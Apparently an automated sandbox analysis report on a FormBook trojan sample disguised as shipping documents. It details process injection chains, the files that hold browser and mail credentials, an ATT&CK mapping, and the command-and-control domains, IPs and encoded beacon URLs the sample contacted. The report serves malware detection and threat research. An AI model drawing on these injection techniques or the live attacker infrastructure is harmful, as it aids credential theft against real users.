Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sc.exe

Thread register set: target process: 8028

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sc.exe

Thread APC queued: target process: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AB6008

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009F87B1 LogonUserW,

0_2_009F87B1

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_009A3B3A

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_009A48D7

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00A04C27 mouse_event,

0_2_00A04C27

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"	Jump to behavior
Source: C:\Program Files (x86)\gXVCqRNOzOibuFXiseqZQlBHuSkWCDrzLlwHFybcUlDmIqNrdAwDnshXcPEsdGYRebR\hcwvcDPvVeAzsY.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009F7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009F7CAF

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009F874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009F874B

Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: hcwvcDPvVeAzsY.exe, 00000006.00000000.1937068587.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2584143287.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584600338.0000000001721000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: AWB_5771388044 Documente de expediere.exe, hcwvcDPvVeAzsY.exe, 00000006.00000000.1937068587.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2584143287.00000000013B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: hcwvcDPvVeAzsY.exe, 00000006.00000000.1937068587.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2584143287.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584600338.0000000001721000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: hcwvcDPvVeAzsY.exe, 00000006.00000000.1937068587.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000006.00000002.2584143287.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584600338.0000000001721000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009C862B cpuid

0_2_009C862B

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009D4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009D4E87

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009E1E06 GetUserNameW,

0_2_009E1E06

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009D3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_009D3F3A

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_009A49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009A49A0

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2584855517.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2584715136.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2583125879.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016788677.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2584635635.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2017207373.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2586189448.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016510291.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_81
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_XP
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_XPe
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_VISTA
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_7
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_8
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2584855517.0000000003750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2584715136.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2583125879.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016788677.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2584635635.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2017207373.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2586189448.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2016510291.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A16283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00A16283
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00A16747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00A16747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Service Execution	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	412 Process Injection	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AWB_5771388044 Documente de expediere.exe	53%	ReversingLabs	Win32.Trojan.AutoitInject
AWB_5771388044 Documente de expediere.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.jalan2.online/xu9o/	0%	Avira URL Cloud	safe
http://www.bloodbalancecaps.shop/7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66U/gVo6YEkdyxhX4vgPFwxoIoJ2c6DSA==	0%	Avira URL Cloud	safe
http://www.avalanchefi.xyz/ctta/	0%	Avira URL Cloud	safe
http://bloodbalancecaps.shop/7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb	0%	Avira URL Cloud	safe
http://www.avalanchefi.xyz/ctta/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=73htI/07lnbi6jhigENtqW+dHv4h0dKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoKT3ngGEEhsGl0ikPp1D77RlGeR3ylg==	0%	Avira URL Cloud	safe
http://www.jalan2.online/xu9o/?HvrT-t9X=Y1SnkQLh9oyCIrW1nUOSuZnR7CuPFYt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrcY9ba19Ly4xWTmryN/t4ZE1RM2wdiA==&tJ=iJE0gvFHj8PDX8qP	0%	Avira URL Cloud	safe
http://www.avalanchefi.xyz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.avalanchefi.xyz	13.248.169.48	true	true	unknown
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
jalan2.online	108.181.189.7	true	true	unknown
bloodbalancecaps.shop	108.179.253.197	true	true	unknown
www.jalan2.online	unknown	unknown	false	unknown
www.bloodbalancecaps.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.jalan2.online/xu9o/?HvrT-t9X=Y1SnkQLh9oyCIrW1nUOSuZnR7CuPFYt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrcY9ba19Ly4xWTmryN/t4ZE1RM2wdiA==&tJ=iJE0gvFHj8PDX8qP	true	Avira URL Cloud: safe	unknown
http://www.bloodbalancecaps.shop/7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66U/gVo6YEkdyxhX4vgPFwxoIoJ2c6DSA==	true	Avira URL Cloud: safe	unknown
http://www.avalanchefi.xyz/ctta/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=73htI/07lnbi6jhigENtqW+dHv4h0dKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoKT3ngGEEhsGl0ikPp1D77RlGeR3ylg==	true	Avira URL Cloud: safe	unknown
http://www.jalan2.online/xu9o/	true	Avira URL Cloud: safe	unknown
http://www.avalanchefi.xyz/ctta/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.avalanchefi.xyz	hcwvcDPvVeAzsY.exe, 00000008.00000002.2586189448.00000000054DE000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://bloodbalancecaps.shop/7n6c/?tJ=iJE0gvFHj8PDX8qP&HvrT-t9X=ePeKNPyUeLpNn1usywRT/cMVaB/hHeJrwPLb	sc.exe, 00000007.00000002.2585504676.00000000043D4000.00000004.10000000.00040000.00000000.sdmp, hcwvcDPvVeAzsY.exe, 00000008.00000002.2584883100.00000000033F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2307969500.000000000EC34000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sc.exe, 00000007.00000003.2202126445.000000000815E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.avalanchefi.xyz	United States	16509	AMAZON-02US	true
108.179.253.197	bloodbalancecaps.shop	United States	46606	UNIFIEDLAYER-AS-1US	true
108.181.189.7	jalan2.online	Canada	852	ASN852CA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571754
Start date and time:	2024-12-09 17:16:43 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AWB_5771388044 Documente de expediere.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 49 Number of non-executed functions: 283
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hcwvcDPvVeAzsY.exe, PID 6312 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: AWB_5771388044 Documente de expediere.exe

Simulations

Behavior and APIs

Time	Type	Description
11:19:17	API Interceptor	19x Sleep call for process: sc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	AWB_5771388044 Documente de expediere.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/ctta/
	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	www.hsa.world/09b7/
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	www.lovel.shop/rxts/
	RFQ _ Virtue 054451000085.exe	Get hash	malicious	FormBook	Browse	www.snyp.shop/4nyz/
	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	www.krshop.shop/5p01/
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	www.egyshare.xyz/440l/
	purchase order.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SRT68.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/vxa5/
	ek8LkB2Cgo.exe	Get hash	malicious	FormBook	Browse	www.remedies.pro/4azw/
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
108.179.253.197	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	www.bloodbalancecaps.shop/qimy/
108.179.253.197	SW_5724.exe	Get hash	malicious	FormBook	Browse	www.bloodbalancecaps.shop/qimy/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.avalanchefi.xyz	AWB_5771388044 Documente de expediere.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	SRT68.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	lKvXJ7VVCK.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
s-part-0035.t-0009.t-msedge.net	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	cwqqRXEhZb.msi	Get hash	malicious	Unknown	Browse	13.107.246.63
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	13.107.246.63
	Need Price Order No.17084 PARLOK.exe	Get hash	malicious	FormBook	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	13.107.246.63
	hlhF3wf7yX.dll	Get hash	malicious	Unknown	Browse	13.107.246.63
	Utils.dll.dll	Get hash	malicious	Codoso Ghost, Hancitor	Browse	13.107.246.63
	AerF91EIjj.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	Tarun Loomba Signature Required.pdf	Get hash	malicious	Unknown	Browse	192.185.35.240
	AWB_5771388044 Documente de expediere.exe	Get hash	malicious	FormBook	Browse	108.179.253.197
	Owari.sh4.elf	Get hash	malicious	Unknown	Browse	192.163.253.90
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	192.185.131.189
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	192.185.131.189
	jmhgeojeri.elf	Get hash	malicious	Unknown	Browse	162.145.178.130
	Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml	Get hash	malicious	Unknown	Browse	192.185.35.240
	TECHNICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	192.254.225.136
	https://hujalconcretos.com/npp	Get hash	malicious	Unknown	Browse	192.185.131.189
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	108.179.253.197
AMAZON-02US	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.50
	iVH355vnza.vbs	Get hash	malicious	Unknown	Browse	185.166.143.50
	m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	54.217.10.153
	mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	34.249.145.219
